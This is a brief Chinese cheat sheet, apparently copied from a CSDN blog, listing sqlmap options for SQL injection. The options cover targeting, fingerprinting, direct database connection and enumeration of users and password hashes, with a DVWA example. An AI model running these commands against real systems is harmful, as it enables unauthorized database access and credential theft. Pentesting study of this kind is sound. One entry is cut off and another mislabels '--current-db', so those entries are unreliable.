来源:https://blog.csdn.net/ski_12/article/details/58188331
-u #注入点
-r “” # 加载文件注入
sqlmap.py -r “d://a.txt”
-f #指纹判别数据库类型
-b #获取数据库版本信息 也可以写成–banner
-d参数,直接连接数据库服务器,作为数据库客户端使用而不是通过SQL注入漏洞查询进行,查询速度较快,前提是已知数据库当前的用户名及其密码、IP、端口(3306端口为mysql)和数据库名称(dvwa):
sqlmap.py -d “mysql://user:password@10.10.10.137:3306/dvwa” -f --users
-p #指定可测试的参数(?page=1&id=2 -p “page,id”) 使- -level失效
-m参数,将有多个URL的文件提交上来进行扫描:
sqlmap.py -m urllist.txt --users
-D “” #指定数据库名
-T “” #指定表名
-C “” #指定字段
-s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “
-wizard:命令参数向导
--columns #列出字段
--cookie="cookie" #携带cookie连接
--current-db #查看当前数据库管理系统用户
--current-user #查看当前数据库管理**系统用户**
--users #查看当前数据库的**所有用户**
--passwords